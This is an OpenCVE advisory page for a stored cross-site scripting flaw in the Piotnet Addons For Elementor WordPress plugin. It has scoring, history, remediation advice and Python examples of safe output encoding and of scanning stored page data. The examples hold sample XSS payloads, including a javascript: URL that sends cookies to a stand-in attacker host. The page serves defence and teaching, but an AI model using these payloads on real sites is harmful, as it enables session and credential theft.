Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in piotnetdotcom Piotnet Addons For Elementor piotnet-addons-for-elementor allows Stored XSS. This issue affects Piotnet Addons For Elementor: from n/a through <= 2.4.31.
Published: 2025-01-07
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The plugin stores user‑controlled widget content that is later written into the page without proper output encoding, so an attacker who can save such content can inject JavaScript that executes in the browser of every user who views the affected page. Because the payload is persisted, it fires on each view with no further interaction from the attacker. Consequences include session hijacking, credential theft, site defacement and actions taken with the viewing user's privileges, for example an administrator's. The weakness corresponds to CWE‑79.
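As an added illustration in Python (not code from the plugin or from the advisory), the pattern described above: a widget renderer that interpolates stored settings verbatim, beside one that encodes for the HTML context each value lands in. The field names and payloads are constructed for the example. What it adds to the paragraph is that HTML encoding alone does not neutralize a javascript: URL placed in an href, so URL‑valued settings also need a scheme allow‑list, applied after the same whitespace stripping browsers perform.

```python
import html
from urllib.parse import urlparse

# Constructed attacker-controlled widget settings, standing in for values a
# low-privileged editor could save through a page-builder widget. The field
# names are hypothetical, not the plugin's real schema.
MALICIOUS_SETTINGS = {
    "title": '<img src=x onerror="alert(document.cookie)">',
    "link": "javascript:alert(document.domain)",
    "tooltip": '" autofocus onfocus="alert(1)',
}

ALLOWED_SCHEMES = {"", "http", "https", "mailto"}  # "" keeps relative URLs


def render_unsafe(settings):
    """Vulnerable pattern: stored values are interpolated into HTML verbatim."""
    return (
        f'<a href="{settings["link"]}" title="{settings["tooltip"]}">'
        f'{settings["title"]}</a>'
    )


def safe_url(value):
    """Return the URL if its scheme is allowed, otherwise a harmless '#'.

    Browsers drop tab, LF and CR anywhere in a URL and ignore leading and
    trailing whitespace before they look at the scheme, so the same
    normalisation is applied here; otherwise 'java\\tscript:' would pass.
    """
    cleaned = "".join(ch for ch in value if ch not in "\t\n\r").strip()
    scheme = urlparse(cleaned).scheme.lower()
    return cleaned if scheme in ALLOWED_SCHEMES else "#"


def render_safe(settings):
    """Hardened pattern: encode for the HTML context each value lands in.

    html.escape(quote=True) covers attribute values and element text; the
    href additionally needs the scheme check, because '&quot;' and '&lt;'
    do nothing against a well-formed 'javascript:' URL.
    """
    return (
        f'<a href="{html.escape(safe_url(settings["link"]), quote=True)}" '
        f'title="{html.escape(settings["tooltip"], quote=True)}">'
        f'{html.escape(settings["title"], quote=True)}</a>'
    )


if __name__ == "__main__":
    print("unsafe:", render_unsafe(MALICIOUS_SETTINGS))
    print("safe:  ", render_safe(MALICIOUS_SETTINGS))
```

Running the block prints the two renderings side by side: the unsafe one carries a live onerror handler, an injected onfocus attribute and a javascript: href, while the safe one reduces all three to inert text and a '#' link.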

Affected Systems

The WordPress plugin Piotnet Addons For Elementor, version 2.4.31 and earlier, is affected; the advisory gives no lower bound. Any site that has installed this plugin and renders content built with its widgets is potentially vulnerable, and the exposure is greatest where users with low‑privileged roles are allowed to create or edit such content.

Risk and Exploitability

The CVSS 3.1 score of 6.5 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L) indicates moderate severity: the attack is network‑reachable and low‑complexity, but it requires an authenticated account with low privileges (PR:L), typically a role that can create or edit content through the plugin's widgets, and a victim who views the affected page (UI:R). The EPSS score of less than 1% implies a low probability of exploitation at present, the vulnerability is not listed in the CISA KEV catalog, and the SSVC assessment recorded on this page rates exploitation as none and the issue as not automatable. Once the stored payload is rendered, the injected script runs in the victim's browser with that user's session, so the impact is bounded by what that session can do in the site; the scope change (S:C) reflects that the impact lands in the browser rather than in the vulnerable plugin itself.

Generated by OpenCVE AI on May 1, 2026 at 22:38 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Piotnet Addons For Elementor to a release newer than 2.4.31 once the vendor publishes one that addresses this issue. The advisory on this page does not name a fixed version, so treat every version through 2.4.31 as affected and confirm the fix in the plugin's changelog before relying on it.
  • Until then, review content created with the plugin's widgets, particularly by contributor, author or other low‑privileged roles, for script elements, event‑handler attributes and javascript: URLs, and remove or re‑save cleaned versions. Upgrading does not remove payloads that are already stored.
  • A web‑application firewall that blocks common script‑injection patterns in content submissions reduces exposure for new content, but it is not a substitute for output encoding in the plugin and does nothing for data already in the database.
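One way to carry out the content review in the second recommendation, as an added example that is not part of the advisory or of the plugin: a script that walks an Elementor page's stored `_elementor_data` post meta (the JSON Elementor keeps per page, obtainable with `wp post meta get <post_id> _elementor_data`) and reports widget settings containing script elements, event‑handler attributes or javascript: URLs. The sample data, widget name, ids and setting keys are constructed; the `pafe-` widget prefix is an assumption about how this plugin names its widgets, and passing an empty prefix scans every widget on the page.

```python
import json
from html.parser import HTMLParser

# Constructed sample of one page's `_elementor_data` post meta. Only the
# nesting (elType / widgetType / settings / elements) follows Elementor's
# stored format; the ids, widget name and setting keys are hypothetical.
SAMPLE_ELEMENTOR_DATA = json.dumps([
    {"id": "a1b2c3", "elType": "section", "settings": {}, "elements": [
        {"id": "d4e5f6", "elType": "column", "settings": {}, "elements": [
            {"id": "0a1b2c", "elType": "widget", "widgetType": "heading",
             "settings": {"title": "Welcome"}},
            {"id": "3d4e5f", "elType": "widget", "widgetType": "pafe-example-widget",
             "settings": {
                 "title": "Promo",
                 "button_link": {"url": "javascript:fetch('//attacker.invalid/?c='+document.cookie)"},
                 "description": '<p>Hi</p><img src=x onerror="alert(document.cookie)">',
                 "items": [{"label": "ok"}, {"label": "<svg onload=alert(1)>"}],
             }},
        ]},
    ]},
])


def is_js_url(value):
    """True for a javascript: URL, after the whitespace stripping browsers do."""
    if not value:
        return False
    cleaned = "".join(ch for ch in value if ch not in "\t\n\r").strip().lower()
    return cleaned.startswith("javascript:")


class ActiveContentFinder(HTMLParser):
    """Records markup that executes script if the string is rendered unencoded."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe", "object", "embed"):
            self.findings.append(f"<{tag}>")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} on <{tag}>")
            elif name in ("href", "src", "action", "formaction") and is_js_url(value):
                self.findings.append(f"javascript: in {name} on <{tag}>")


def scan_value(value, path, findings):
    """Walk nested settings; test every string both as a URL and as HTML."""
    if isinstance(value, str):
        if is_js_url(value):
            findings.append((path, "javascript: URL"))
        parser = ActiveContentFinder()
        parser.feed(value)
        parser.close()
        findings.extend((path, f) for f in parser.findings)
    elif isinstance(value, dict):
        for key, item in value.items():
            scan_value(item, f"{path}.{key}", findings)
    elif isinstance(value, list):
        for index, item in enumerate(value):
            scan_value(item, f"{path}[{index}]", findings)


def scan_elementor_data(raw_json, widget_prefix="pafe-"):
    """Return (setting path, finding) pairs for widgets whose type starts with
    widget_prefix. The default assumes this plugin's widgets use a 'pafe-'
    prefix (an assumption); pass "" to inspect every widget on the page."""
    findings = []

    def walk(elements):
        for element in elements:
            widget_type = element.get("widgetType", "")
            if element.get("elType") == "widget" and widget_type.startswith(widget_prefix):
                scan_value(element.get("settings", {}),
                           f"{widget_type}#{element.get('id')}", findings)
            walk(element.get("elements", []))

    walk(json.loads(raw_json))
    return findings


if __name__ == "__main__":
    for path, finding in scan_elementor_data(SAMPLE_ELEMENTOR_DATA):
        print(f"{path}: {finding}")
```

Each finding names the widget type, element id and setting path, which is enough to locate and clean the entry in the Elementor editor or to re‑save the page after editing. The parser is deliberately strict: any on* attribute is reported, because the list of event handlers browsers honour is long and grows, and a legitimate widget setting has no reason to contain one.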

Generated by OpenCVE AI on May 1, 2026 at 22:38 UTC.

Tracking


Advisories
Source: EUVD
ID: EUVD-2025-2733
Title: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Piotnet Piotnet Addons For Elementor allows Stored XSS. This issue affects Piotnet Addons For Elementor: from n/a through 2.4.31.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type: Metrics
cvssV3_1: {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type: Description
Value removed: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Piotnet Piotnet Addons For Elementor allows Stored XSS. This issue affects Piotnet Addons For Elementor: from n/a through 2.4.31.
Value added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in piotnetdotcom Piotnet Addons For Elementor piotnet-addons-for-elementor allows Stored XSS. This issue affects Piotnet Addons For Elementor: from n/a through <= 2.4.31.
Type: References
Type: Metrics
cvssV3_1: {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Tue, 07 Jan 2025 16:15:00 +0000

Type: Metrics
ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 07 Jan 2025 11:00:00 +0000

Type: Description
Value added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Piotnet Piotnet Addons For Elementor allows Stored XSS. This issue affects Piotnet Addons For Elementor: from n/a through 2.4.31.
Type: Title
Value added: WordPress Piotnet Addons For Elementor plugin <= 2.4.31 - Cross-Site Scripting vulnerability
Type: Weaknesses
Value added: CWE-79
Type: References
Type: Metrics
cvssV3_1: {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

MITRE

Status: PUBLISHED
Assigner: Patchstack
Published:
Updated: 2026-04-28T16:10:59.643Z
Reserved: 2025-01-03T13:16:33.553Z
Link: CVE-2025-22333

Vulnrichment

Updated: 2025-01-07T15:22:50.328Z

NVD

Status: Deferred
Published: 2025-01-07T11:15:17.160
Modified: 2026-04-23T15:23:02.190
Link: CVE-2025-22333

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-01T22:45:26Z

Weaknesses